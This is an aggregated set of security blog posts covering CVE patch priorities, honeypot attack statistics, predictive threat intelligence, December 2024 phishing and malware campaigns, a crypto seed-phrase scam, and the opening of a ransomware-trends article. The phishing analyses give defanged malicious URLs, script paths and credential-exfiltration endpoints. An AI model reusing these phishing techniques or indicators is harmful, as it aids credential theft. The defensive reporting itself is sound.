IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More

Cyble-Blogs-IT-Vulnerability

Overview

Cyble’s December 19 IT vulnerability report to clients highlighted nine vulnerabilities at high risk of attack, including five under active discussion on dark web forums.

Cyble vulnerability intelligence and dark web researchers also noted threat actor claims of zero-day vulnerabilities for sale affecting Palo Alto Networks devices and Chrome and Edge browsers.

In total, Cyble researchers examined 13 vulnerabilities and 8 dark web exploits to arrive at the list of vulnerabilities that security teams should prioritize for patching. At-risk products include Apache Struts, Qualcomm digital signal processors (DSPs), a WordPress plugin, a Bluetooth flaw affecting Ubuntu, and more.

The Week’s Top Vulnerabilities

CVE-2024-53677: This file upload logic vulnerability in the Apache Struts web application framework has been rated 9.5 severity by the Apache Software Foundation but is still undergoing NVD analysis. An attacker could exploit the vulnerability to manipulate file upload parameters to enable path traversal and potentially upload a malicious file that could be used to perform remote code execution. Recently, researchers disclosed that threat actors are attempting to exploit the vulnerability using public proof-of-concept exploits to allow remote code execution, and exploitation has also been discussed on dark web forums. Cyble also published a separate blog on this vulnerability.

Cyble researchers noted that there are nearly 200,000 vulnerable Apache Struts instances exposed to the internet (image below):

CVE-2024-43047: This vulnerability affects Qualcomm’s Digital Signal Processor (DSP) service, which is utilized in many Android devices. It allows for privilege escalation and arbitrary code execution, posing significant risks to affected systems. Google Project Zero marked the vulnerability as actively exploited in October 2024 and received a fix on Android in November 2024. Researchers also observed that the Serbian government exploited Qualcomm zero-days, including CVE-2024-43047, to unlock and infect Android devices with a new spyware family named “NoviSpy.”

CVE-2024-11972: The CVE for this vulnerability has been reserved but has not yet been created. The flaw affects the Hunk Companion WordPress plugin, which is designed to enhance functionality and build visually appealing websites without extensive coding knowledge. The vulnerability allows attackers to perform unauthenticated plugin installation through unauthorized POST requests, enabling them to install and activate other plugins that may contain known vulnerabilities. According to researchers, attackers are exploiting the vulnerability to install outdated plugins with known flaws from the WordPress.org repository. This allows them to access vulnerabilities that can lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS), or the creation of backdoor admin accounts, posing significant risks to site security.

CVE-2023-45866: This medium-severity vulnerability affects Bluetooth HID Hosts in systems utilizing BlueZ, particularly in Ubuntu 22.04 LTS with the BlueZ 5.64-0ubuntu1 package. This vulnerability allows an unauthenticated peripheral HID device to initiate an encrypted connection, potentially enabling the injection of Human Interface Device (HID) messages without user interaction.

Vulnerabilities and Exploits on Underground Forums

Cyble Research and Intelligence Labs (CRIL) researchers also identified the following exploits and vulnerabilities discussed on Telegram channels and cybercrime forums, raising the risk that they will be exploited in attacks.

CVE-2024-28059: This critical security vulnerability, which was identified in the MyQ Print Server in versions prior to 8.2 (patch 43), allows remote attackers to gain elevated privileges on the target server.

CVE-2024-38819: This high-severity path traversal vulnerability in the Spring Framework specifically affects applications that utilize WebMvc.fn or WebFlux.fn functional web frameworks.

CVE-2024-35250: This high-severity privilege escalation vulnerability in the Microsoft Windows operating system specifically affects the kernel-mode driver.

CVE-2024-40711: This critical vulnerability identified in Veeam Backup & Replication software allows for unauthenticated remote code execution (RCE) due to deserialization of untrusted data.

CVE-2023-27997: This heap-based buffer overflow vulnerability in certain FortiOS and FortiProxy versions may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests, specifically affecting SSL VPNs.

Threat actors were also observed offering a zero-day exploit weaponizing a vulnerability claimed to be present on Palo Alto Network’s PAN-OS VPN-supported devices (asking price: $60,000) and a zero-day exploit weaponizing a vulnerability allegedly present in Chrome and Edge (asking price: $100,000).

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching exploitable vulnerabilities in sensitive products and vulnerabilities that could be weaponized as entry points for wider attacks. With increasing discussion of these exploits on dark web forums, organizations must stay vigilant and proactive.

Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive threat intelligence solution like Cyble can monitor for threats and leaks specific to your environment, allowing you to respond quickly to events and prevent them from becoming wider incidents.

The post IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More appeared first on Cyble.

Blog – Cyble – ​Read More

Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More

Cyble-Blogs-Ivanti

Overview

Cyble honeypot sensors detected dozens of vulnerabilities under attack in the threat intelligence leader’s most recent sensor intelligence report, including fresh attacks on an Ivanti vulnerability.

Threat actors also targeted vulnerabilities affecting PHP and the Ruby SAML library. Cyble’s Dec. 19 report noted that unpatched networks and IoT devices remain popular targets for hackers looking to breach networks and add to botnets.

The report also looked at Linux and Windows exploits, common brute-force attacks, and phishing campaigns.

Vulnerabilities Under Attack

Cyble detected fresh attacks on CVE-2024-7593, a critical authentication bypass vulnerability in the authentication algorithm implementation of Ivanti’s Virtual Traffic Manager (vTM), excluding versions 22.2R1 and 22.7R2. The 9.8-severity vulnerability can allow a remote, unauthenticated attacker to bypass admin panel authentication. It was added to CISA’s Known Exploited Vulnerabilities catalog in September, one of 11 Ivanti vulnerabilities CISA has added to the KEV catalog this year.

CVE-2024-4577 also remains under attack. The critical PHP vulnerability impacts CGI configurations and remains vulnerable in PHP versions 8.1.* before 8.1.29; 8.2.* before 8.2.20; and 8.3.* before 8.3.8. The 9.8-severity vulnerability enables attackers to execute arbitrary commands through specially crafted URL parameters.

CVE-2024-45409, a vulnerability in the Ruby SAML library designed for implementing the client side of SAML authorization, also remains a frequent target for hackers. In versions 1.12.2 and earlier, and 1.13.0 to 1.16.0, the library fails to verify the signature of SAML Responses properly. The flaw allows an unauthenticated attacker with access to a signed SAML document (issued by the IdP) to forge a SAML Response or Assertion with arbitrary contents, enabling unauthorized login as any user within the affected system. The issue has been resolved in versions 1.17.0 and 1.12.3.

Network and IoT Devices Under Attack

Network and IoT devices remain particularly popular with threat actors, as they can provide entry points into networks as well as additional nodes in a botnet. With many devices with vulnerabilities from 2023 and earlier still unpatched, Cyble noted that the following network vulnerabilities remain particularly popular with attackers:

CVE-2023-20198, a 10.0-severity vulnerability in the web UI feature of the Cisco IOS XE operating system, is being chained with CVE-2023-20273 to gain root privileges in vulnerable devices.

CVE-2023-4966 is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateways when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.

CVE-2023-1389 is a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface of TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

CVE-2023-46747 could allow undisclosed requests in F5 BIG-IP to bypass the configuration utility authentication, allowing an attacker with network access to the system through the management port and/or self-IP addresses to execute arbitrary system commands.

Vulnerabilities in real-time operating systems (RTOS) and embedded devices remain extremely popular with attackers, exposing operational technology (OT) networks with vulnerable devices to attack.

One last vulnerability hackers keep returning to is CVE-2023-47643, an unauthorized GraphQL Introspection vulnerability in the SuiteCRM Customer Relationship Management (CRM) system in versions before 8.4.2. The flaw allows an attacker to access the GraphQL schema without authentication, revealing all object types, arguments, functions, and sensitive fields such as UserHash. By understanding the exposed API attack surface, attackers can exploit this information to access sensitive data.

Linux systems remain continually under attack by CoinMiner, Mirai Botnet, and IRCBot malware, while hundreds of WannaCry ransomware samples continue to be detected each week in Windows 10, Windows Server 2016, and older systems vulnerable to CVE-2017-0147.

Remote Protocols Targeted in Brute-Force Attacks

Remote access protocols, particularly VNC (port 5900), remain popular targets of brute-force attacks. Examining the ports most targeted by the top five attacker countries, attacks originating from the United States targeted ports 5900 (42%), 22 (36%), 3389 (14%), 80 (5%), and 23 (3%). Attacks originating from Russia targeted ports 5900 (81%), 445 (7%), 22 (5%), 23 (3%), and 1433 (3%). Netherlands, Jordan, and China majorly targeted ports 5900, 22, and 445.

Security analysts are advised to add security system blocks for frequently attacked ports (such as 22, 3389, 443, 445, 5900, and 3306).

New Phishing Campaigns Detected

Cyble detected 277 new scam and phishing email addresses in the most recent weekly report. Here are six notable ones, including subject lines:

 E-mail Subject  Scammers Email ID  Scam Type  Description 
Are you interested in investment    Dave@oig.com  Investment Scam  Unrealistic investment offers to steal funds or data 
UN Compensation Fund.   zagranica@usa.com  Claim scam  Fake compensation fund claim 
COMPENSATION FUND OF 5.5 MILLION DOLLARS.        Info@uba.org  Claim scam  Fake compensation fund email 
Funding projects up to USD 5 Billion      noreply@order.eventbrite.com  Investment Scam  Unrealistic investment offers to steal funds or data 
HOTEL AND REAL ESTATE INVESTMENTS     richardowenr928@gmail.com  Investment Scam  Fake hotel and real estate investment scam 
My Donation           test@cinematajrobi.ir  Donation Scam  Fake donation mail to steal money 

Recommendations and Mitigations

Cyble researchers recommend the following security controls:

  • Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).
  • Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
  • Constantly check for Attackers’ ASNs and IPs.
  • Block Brute Force attack IPs and the targeted ports listed.
  • Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
  • For servers, set up strong passwords that are difficult to guess.

Conclusion

With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching wherever possible and applying mitigations where patching isn’t possible. The large number of brute-force attacks and phishing campaigns show that attackers remain active even heading into the holiday season.

To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach will be key in protecting defenses against exploitation and data breaches.

The post Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More appeared first on Cyble.

Blog – Cyble – ​Read More

Predictive Threat Intelligence – Predictions for 2025: The Future of CTI

Cyble Threat Intelligence

Cybersecurity has long been an essential element of organizational defense, with the growing complexity and frequency of cyberattacks propelling the development of cybersecurity practices. Among these practices, Threat Intelligence (TI) has become a central element, helping organizations anticipate, understand, and counter various cyber threats. As we approach 2025, however, a new evolution in threat intelligence is emerging: Predictive Threat Intelligence (PTI).

While traditional Threat Intelligence (TI) focuses on collecting, analyzing, and sharing data on cyber threats after they occur, Predictive Threat Intelligence goes a step further. It uses advanced techniques, particularly AI (artificial intelligence) and machine learning (ML), to predict cyber threats before they materialize. This field holds great promise for proactively strengthening an organization’s cybersecurity posture by providing early warnings, reducing damage from potential attacks, and enabling defense strategies based on anticipatory insights.

What Is Cyber Threat Intelligence (CTI), and how is it Different from Predictive Threat Intelligence (PTI)?

Cyber Threat Intelligence (CTI) is the practice of collecting, analyzing, and sharing data about cyber threats. By gaining insights into threat actors’ behavior and tactics, techniques, and procedures (TTPs), organizations can better understand potential cyber threats, allowing them to prepare, respond, and mitigate potential attacks.

Traditional Threat Intelligence tends to focus on reactive measures, where security teams analyze attack patterns after a breach or threat occurs. In contrast, Predictive Threat Intelligence (PTI) takes a more proactive stance. By leveraging AI and ML, PTI not only understands current cyber threats but also forecasts future attacks before they materialize.

Machine learning algorithms analyze large datasets, including historical threat data and emerging patterns, to predict the types of threats organizations might face in the near future. For example, if an AI model detects a surge in phishing attacks against a particular industry, it can alert organizations in that sector to prepare for a potential escalation in attacks. This predictive capability allows organizations to take precautionary measures before a threat becomes imminent.

Predictive Threat Intelligence enhances the traditional threat intelligence model by offering actionable, anticipatory insights that enable proactive security measures, such as patching vulnerabilities or reinforcing defenses against specific attack vectors before they are widely exploited. This shift from reactive to proactive cybersecurity is positioned to transform the way organizations approach risk management and threat mitigation.

Why Is Cyber Threat Intelligence (CTI) Important?

Understanding the importance of Cyber Threat Intelligence (CTI) is important to appreciating its role in the cybersecurity ecosystem. As cyberattacks become increasingly damaging, the need for effective threat intelligence grows. Without comprehensive CTI, organizations would be left scrambling to respond to attacks, often too late to prevent significant damage.

CTI provides essential insights into cyber threats, including information about threat actors, their motives, and the vulnerabilities they exploit. With this knowledge, organizations can develop more rugged defense mechanisms and avoid becoming targets for specific types of attacks.

The most compelling reason for investing in CTI is its ability to elevate organizational security beyond reactive measures. By enabling organizations to recognize online threats early, CTI empowers security teams to adopt a proactive security posture. Proactive defense strategies allow vulnerabilities to be patched before they can be exploited and preparations to be made for impending threats, all of which contribute to reducing the overall risk of a breach.

How Does Predictive Threat Intelligence Work?

Predictive Threat Intelligence works by combining AI, machine learning, and advanced analytics to analyze vast amounts of historical and real-time threat data. By understanding the TTPs of cyber adversaries, these tools can identify patterns that signal emerging threats. Here’s how it works in practice:

  1. Data Collection: Predictive threat intelligence platforms collect data from diverse sources, including the surface web, deep web, and dark web, as well as intelligence from private threat-sharing organizations and public cybersecurity resources. These datasets provide crucial insights into potential vulnerabilities and attack vectors.
  2. Data Processing and Analysis: AI models and machine learning algorithms process the collected data, identifying potential threats based on historical attack patterns and emerging trends. For instance, if a surge in phishing attacks targeting a specific industry is detected, AI models can recognize similar characteristics or tactics that might indicate future attacks.
  3. Threat Forecasting: Predictive intelligence platforms then forecast potential threats based on identified trends. For example, AI can predict that a new form of ransomware is gaining traction among cybercriminals, alerting organizations to prepare for a possible attack.
  4. Proactive Response: Once potential threats are identified, the predictive system provides actionable intelligence to help organizations bolster their defenses. These could include patching known vulnerabilities, updating defense strategies, and alerting stakeholders to prepare for specific attack scenarios.

The Role of Artificial Intelligence and Machine Learning in Predictive Threat Intelligence

While Predictive Threat Intelligence (PTI) involves more than just AI, artificial intelligence and machine learning play a crucial role in its development. AI’s strength lies in its ability to analyze massive volumes of data, recognize patterns, and make predictions about future events, including cyberattacks.

However, despite the potential, AI and ML alone are not enough to guarantee a fully predictive threat intelligence model. Predictive intelligence is complex, and building reliable, actionable insights requires a balanced integration of human intelligence and automated systems.

The role of AI and machine learning in predictive intelligence includes:

  • Threat Detection: AI can identify anomalous behavior in network traffic, suggesting potential attack attempts.
  • Risk Analysis: By analyzing attack vectors and patterns, AI models can prioritize potential risks based on the severity of the threats and their likelihood of occurring.
  • Automation: Machine learning models can automate certain security functions, such as scanning for vulnerabilities and patching security gaps, without the need for human intervention.

The Challenge of Implementing Predictive Threat Intelligence

While predictive threat intelligence is a highly promising approach, it faces several challenges, especially in terms of implementation.

  1. Data Availability: One of the primary hurdles is the availability of quality data. AI and machine learning models require large, diverse datasets to learn and predict threats accurately. However, data is often fragmented and may not be available in a standardized format, making it difficult for predictive systems to integrate and analyze it effectively.
  2. Complexity of Predictive Models: Predicting future threats is an inherently complex task. As with any prediction, there is a degree of uncertainty, and not every forecast will be accurate. The dynamic nature of cybersecurity means that there will always be a level of unpredictability when it comes to forecasting attacks.
  3. Human Expertise: Although AI and machine learning are powerful tools, human expertise is still necessary to interpret the data and provide context. Human analysts play a critical role in identifying nuanced threats and validating AI predictions to ensure the intelligence is actionable.
  4. Data Privacy and Sharing: Threat intelligence requires data from multiple sources, including potentially sensitive or confidential data. Therefore, sharing threat intelligence can raise privacy concerns, especially in industries like finance or healthcare. Developing systems that allow for safe and ethical sharing of threat data is essential for the success of PTI.

The Future of Predictive Threat Intelligence in 2025

As we look toward 2025, the role of Predictive Threat Intelligence (PTI) in cybersecurity will become increasingly important. By predicting threats before they materialize, PTI will enable organizations to stay one step ahead of cybercriminals, minimizing the risks of cyber threats.

In the near future, advancements in AI-powered threat intelligence will allow organizations to:

  • Improve the automation of cybersecurity workflows, enabling faster, more accurate threat detection and mitigation.
  • Enhance the integration of AI and human expertise, creating a more effective hybrid threat intelligence model.
  • Develop better predictive models that consider a wider array of threat actors and attack vectors, leading to more accurate forecasts.
  • Better share threat intelligence across industries, increasing collaboration and improving overall cybersecurity resilience.

Cyble, an industry leader in Cyber Threat Intelligence, has been at the forefront of this evolution. Cyble’s Cyber Threat Intelligence Platform provides real-time insights into potential threats, combining historical threat data with AI-driven analysis to deliver actionable, predictive intelligence. By integrating diverse data sources, Cyble enables organizations to identify potential threats, prioritize risks, and take proactive measures to mitigate potential breaches.

Why Choose Cyble?

Cyble offers a comprehensive cyber threat intelligence solution that empowers organizations to tackle cyber threats more effectively. With features like dark web monitoring, vulnerability management, and AI-driven analysis, Cyble helps companies not only detect threats but also predict and prevent them before they cause damage.

Cyble’s platform integrates seamlessly with your existing security infrastructure, enabling you to:

  • Gather intelligence from various sources, including the deep and dark web, to identify emerging threats.
  • Augment data with contextual insights for better decision-making.
  • Receive timely notifications about potential threats and vulnerabilities, enabling proactive defense strategies.

Cyble is ready to help businesses understand and walk through this dynamic landscape and stay protected against cyber threats in 2025 and beyond.

Conclusion: Stay Ahead with Cyble

Predictive Threat Intelligence is the future of threat Intelligence. By leveraging advanced technologies like AI and machine learning, organizations can anticipate threats before they emerge, minimizing the damage caused by cyberattacks. As we move towards 2025, Predictive Threat Intelligence will be an essential tool in every cybersecurity strategy.

If you want to strengthen your organization’s defenses and stay protected from upcoming threats, Cyble’s threat intelligence platform is your go-to solution. Schedule a demo today and discover how Cyble can help you proactively secure your assets against the threats of tomorrow.

The post Predictive Threat Intelligence – Predictions for 2025: The Future of CTI appeared first on Cyble.

Blog – Cyble – ​Read More

5 Major Cyber Attacks in December 2024

The cybersecurity research team of ANY.RUN found and analyzed a bunch of emerging threats with the help of our mighty Interactive Sandbox and Threat Intelligence Lookup.

We’ve been sharing their findings via X and in our blog. Here is a summary on the most interesting insights from December 2024.

Phishing Campaigns targeting Microsoft’s Azure Blob Storage

Original post on X

Phishing page: HTML document with a characteristic attribute

Cyber criminals are abusing Microsoft’s cloud-based file storage solution by hosting phishing pages on the service, employing techniques like HTML smuggling.

The phishing pages are HTML documents that contain a block input element with the ID attribute “doom”. The pages include information about users’ software obtained via JScript (OS and browser), to make them more convincing.

Phishing pages on Azure Blob Storage typically have a short lifespan. Attackers may host pages with redirects to phishing sites. With minimal suspicious content, these pages can evade detection slightly longer.

See the analysis session in the ANY.RUN sandbox.

User’s credentials get stolen from fake sign-in form
  • Threat actors leverage the *.blob.core.windows[.]net subdomain to store documents.
  • Company logos are extracted using email address parsing and loaded from the logo[.]clearbit[.]com service.
  • To collect and store stolen data, an HTTP POST request is sent to nocodeform[.]io for collecting form submissions.
AI-generated summary of the attack in the sandbox

Use the following Threat Intelligence Lookup query to find threats targeting the set of requested domains:

See the Tasks tab in the search results for sandbox sessions with malicious URLs

And this search request to find links to HTML pages hosted on Azure Blob Storage.

Get 20 free requests in TI Lookup
to enrich your threat investigations 



Contact us


Microsoft’s OneDrive also fell victim to HTML Blob Smuggling Campaign

The original post on X

As in the attack above, threat actors make victims believe they are logging into a legitimate platform.

Phishing page disguised as OneDrive login form

Using ANYRUN’s MITM feature, we extracted base.js from the traffic and decoded it. The attack begins with a bait placed on OneDrive. After clicking the link, the user is redirected to the main page containing the HTML Blob Smuggling code. After entering their credentials, victims are redirected to a legitimate website.

Stolen credentials are sent via an HTTP POST request to the C2 server.

Attack details: image sources, stolen data route

The website’s design, background, and icons are stored on IPFS, while lure images, mimicking real services, are hosted on imgur .com.

View the attack unfold in the wild: one, other, or yet another sandbox session.

Analyze malicious files and links with ANY.RUN’s Interactive Sandbox for free 



Get 14-day trial


Phishing links in Microsoft Dynamics 365 web forms

Original post on X

And again, a Microsoft service utilized for malicious activity. Phishers create forms with embedded links on *.microsoft.com subdomains. The links that users receive look legitimate, so people feel safe opening them.

With TI Lookup, we uncovered a link that tricked users into attempting to access a non-existent PDF file hosted on a Microsoft website.

Phishing URL: hxxps://customervoice.microsoft[.]com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUNVIzNlI5MEhCNlBPRFMwMklUV0JZVTkxVS4u

Malicious page looks like a document hosted within Microsoft service

Use this simple query for TI Lookup to find attacks employing this technique and view them unveiled in our sandbox.

URLs engaged in the attack, found by TI Lookup

Anatomy of a fresh LogoKit

Original post on X

LogoKit is a comprehensive set of phishing tools known for using services that offer logos and screenshots of target websites. Our team has researched the algorithm of such an attack.

Icons, pictures, backgrounds, forms: LogoKit-powered fake page

Let’s look at the example run in our sandbox.

  • The company’s logo is fetched from a legitimate logo storage service: hxxps://logo.clearbit[.]com/<Domain>.
  • The background is retrieved via request to a website screenshot service, using the following template: hxxps://thum[.]io/get/width/<DPI>/https://<Domain>.
  • The domain chain is led by a decoder-redirector: hxxps:// asiangrocers [.]store/fri/?haooauvpco=bWlubmllQGRpc25leS5jb20. It is a fake Asian food store website built on a #WordPress template, with a domain age of around four years. The template contains email addresses filled with typos.

The decoder-redirector shields the page from analysis and redirects the victim to the actual phishing page.

In our example, the real content of the phishing page and the associated scripts are hosted on the Cloudflare Pages platform. They are stored in the assets/ folder, which contains styles, images, and scripts

Three scripts with random 10-character names are designed to protect the page from analysis and send stolen data to the threat actors:

  • assets/js/e0nt7h8uiw[.]js
  • assets/js/vddq2ozyod[.]js
  • assets/js/j3046eqymn[.]js

The stolen authentication data is sent to a remote Command and Control server controlled by the attackers via an HTTP POST request containing the following parameters: fox=&con=

Manufacturers, beware: an attack combining Lumma and Amadey is targeting you

The cybercriminals’ tactics of attacking the manufacturing industry are recently evolving from data encryption to snatching control over critical infrastructure and stealing sensitive information.

The consequences of such attacks can be severe, leading to theft of intellectual property, disruption of operations, financial losses, and compliance violations. Businesses need to take the threat most seriously, understand it and get prepared.

Attack used Emmenhtal loader to facilitate infection

This December, we have analyzed a new attack aimed at industrial market players. The mechanics are based on Lumma Stealer and Amadey Bot. The former hunts for valuable information, the latter takes control over the infected systems. View analysis.

  • It all starts with phishing emails with URLs leading users to download LNK files disguised as PDFs;
  • The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded;
  • PowerShell and Windows Management Instrumentation (WMI) commands are utilized to collect detailed information about the victim’s system.

For the details, read our blog post, view analysis session in our sandbox and dive deeper with TI Lookup. Use the search query with the name of the threat and the path to one of the malicious files used in the attack.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Get 14-day free trial of ANY.RUN’s Interactive Sandbox →

The post 5 Major Cyber Attacks in December 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Crypto scam: seed phrases shared publicly | Kaspersky official blog

“I have a question. I have USDT stored in my wallet, and I have the seed phrase. How to transfer my funds to another wallet?” — we found a comment like this under a finance-related video on YouTube. And the seed phrase was revealed in full in the comment.

This looked suspicious: even a complete cryptocurrency beginner should know better than to share their seed phrase with the entire world. We were wary, and for a good reason — this comment turned out to be a scam.

Keep reading to find out what can go wrong if you somehow come across someone’s seed phrase…

“I give you the seed phrase, and you help me transfer my money to another wallet”

Let’s start with the basics. A seed phrase is a randomly generated unique sequence of dictionary words that together form a phrase needed to recover access to a cryptowallet. When someone shares their seed phrase — essentially the key to their wallet — it looks extremely suspicious. We then discovered similar comments, each containing the same recovery phrase and a request for help transferring funds to another platform. Notably, all these messages were posted from newly created accounts.

In similar comments written from newly created accounts, supposedly “crypto newbies” generously share their seed phrases

Now, let’s imagine for a second that someone reading one of these comments is a little unscrupulous and, instead of helping the newbie, decides to take a peek inside the wallet (after all, they have the key). Upon opening the wallet, they’re pleasantly surprised to find it stuffed with USDT: a TRC20 token on the TRON network tied to the value of the US dollar. The wallet contains the equivalent of eight thousand dollars. Well, what to do next? The correct answer would be to remember that there’s no such thing as a free lunch, and steer well clear of the wallet.

Finding several thousand US dollars in someone else's wallet looks like a lucky chance to get rich for a immoral person

Finding several thousand US dollars in someone else’s wallet looks like a lucky chance to get rich for a immoral person

However, the scam assumes that our nefarious passerby will want to appropriate all or at least part of the cryptocurrency. But to withdraw USDT, a small fee must be paid in another currency: TRX (the TRON cryptocurrency token). Unfortunately, the wallet doesn’t have enough TRX, so the thief tries to transfer TRX from their own personal wallet — only to discover that the tokens they transferred immediately ended up in a completely different, third wallet.

The list of transactions details the scammers' earnings

The list of transactions details the scammers’ earnings

The catch is that the bait is set up as a multi-signature wallet. To authorize outgoing transactions in such wallets, approval from two or more people is required, so transferring USDT to a personal wallet won’t work — even after paying the “commission”.

So, the scammers are impersonating beginners who foolishly share access to their cryptowallets, tricking equally naive thieves — who end up becoming the victims. In this scenario, the scammers are something like digital Robin Hoods, as the scheme primarily targets other crooked individuals. But this twist is nothing new — we’ve previously covered a much more elegant crypto fraud scheme, also aimed at unprincipled people.

How to protect yourself from crypto scams

The way to protect against the above-described scam is quite simple: just be a decent person and don’t try to get into other people’s cryptowallets — even if the seed phrase is left in the comments of your favorite YouTube channel or even slipped under your front door.

In all other cases, crypto asset owners can follow these universal tips and recommendations:

  • Learn about the latest scams aimed at stealing cryptocurrency to stay aware of current trends.
  • Secure your devices with reliable protection.
  • Double-check any information received from strangers: scammers can pose both as beginners in the crypto world or as experienced trading sharks.

Kaspersky official blog – ​Read More

Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025

Cyble-Blogs-Ransomware

Ransomware attacks have evolved into one of the most significant threats to global cybersecurity. These attacks have shifted from mere opportunistic schemes to advanced operations targeting businesses, critical infrastructure, and even governments. The year 2024 saw ransomware actors innovating at an unprecedented pace, leveraging new technologies and tactics to inflict maximum damage.

With ransomware incidents causing an average cost of $4.54 million per breach—excluding ransom payments—it is imperative for organizations to stay informed and prepared.

This article delves into the top 10 ransomware trends observed in 2024 and provides predictions for what lies ahead in 2025.

1. Double and Triple Extortion Schemes

In 2024, ransomware actors moved beyond simple file encryption to adopt double and triple extortion tactics. These methods involve not only encrypting a victim’s data but also exfiltrating it and threatening to release it publicly unless a ransom is paid. Triple extortion adds another dimension: threatening to disrupt business operations or targeting customers and third parties associated with the victim.

  • Example: A leading healthcare provider in the U.S. fell victim to a triple extortion scheme where attackers encrypted sensitive patient records, exfiltrated the data, and launched Distributed Denial of Service (DDoS) attacks until the ransom was paid. This resulted in financial losses and severe reputational damage.

Prediction for 2025: Expect these multi-layered extortion methods to become the norm as attackers seek greater leverage and higher payouts. Organizations will need to strengthen their data security measures and incident response plans to mitigate these risks.

2. Ransomware-as-a-Service (RaaS) Proliferation

The Ransomware-as-a-Service (RaaS) model gained significant traction in 2024, enabling even low-skilled cybercriminals to launch ransomware attacks. Under this model, ransomware developers provide affiliates with ready-to-use tools and infrastructure in exchange for a share of the profits.

  • Example: Groups like LockBit, BlackCat, and Play have turned RaaS into a booming industry, offering technical support, user manuals, and even marketing strategies to affiliates.

Prediction for 2025: The RaaS ecosystem will expand further, with more criminal groups entering the market. This will likely result in a surge in ransomware incidents targeting small and medium-sized businesses (SMBs) that lack advanced cybersecurity defenses.

3. Data Exfiltration as a Standard Tactic

Stealing sensitive data before encrypting systems has become a standard tactic in ransomware operations. This not only increases the ransom demand but also amplifies the reputational and regulatory consequences for victims.

  • Example: In 2024, a global financial institution faced a ransomware attack where attackers exfiltrated millions of customer records. The breach led to legal consequences and a loss of customer trust, despite the organization’s efforts to recover.

Prediction for 2025: With stricter data privacy regulations like GDPR and CCPA, data exfiltration attacks will pose an even greater risk. Organizations will need to implement stronger encryption and data loss prevention (DLP) solutions to counteract these threats.

4. Zero-Day Exploits and Advanced Phishing

Ransomware groups are increasingly using zero-day vulnerabilities and highly targeted phishing campaigns to gain initial access to victim networks.

  • Example: In 2024, a large technology company was breached when employees fell for an advanced phishing email disguised as a legitimate communication from a trusted vendor. The attackers exploited a zero-day vulnerability to deploy ransomware, causing significant operational downtime.

Prediction for 2025: As more organizations adopt digital transformation initiatives, the attack surface for ransomware groups will expand. Expect more zero-day exploits and socially engineered phishing campaigns aimed at high-value targets.

5. Living Off the Land (LotL) Techniques

Ransomware actors are employing Living Off the Land (LotL) techniques to evade detection by using legitimate tools and processes already present in the victim’s network.

  • Example: In a 2024 attack on a healthcare organization, attackers used PowerShell and Remote Desktop Protocol (RDP) to move laterally within the network without triggering traditional security alarms.

Prediction for 2025: LotL techniques will become more prevalent, making it essential for organizations to implement advanced endpoint detection and response (EDR) solutions and conduct regular audits of privileged accounts.

6. Critical Infrastructure as a Prime Target

Critical infrastructure sectors, including healthcare, energy, and government, have become top targets for ransomware groups. These sectors often lack strong cybersecurity defenses, making them vulnerable to attacks with far-reaching consequences.

  • Example: In 2024, a North American energy provider suffered a ransomware attack that caused widespread power outages and operational disruptions.

Prediction for 2025: With geopolitical tensions on the rise, ransomware attacks on critical infrastructure are expected to increase. Governments and private sectors will need to collaborate on improving the resilience of these essential systems.

7. Industrial Ransomware Targeting Manufacturing

The manufacturing and industrial sectors have seen a rise in ransomware attacks, disrupting production lines and supply chains.

